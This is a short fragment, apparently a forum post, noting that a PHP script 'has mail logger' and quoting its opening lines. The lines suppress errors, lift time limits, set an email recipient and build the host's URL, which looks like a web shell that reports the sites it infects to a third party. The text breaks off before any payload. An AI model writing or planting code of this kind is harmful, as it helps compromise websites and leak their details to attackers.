also this one has mail logger
<?php
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$to = '
[email protected]';
$f31337 = "http://" . $_SERVER['SERVER_NAME'] ...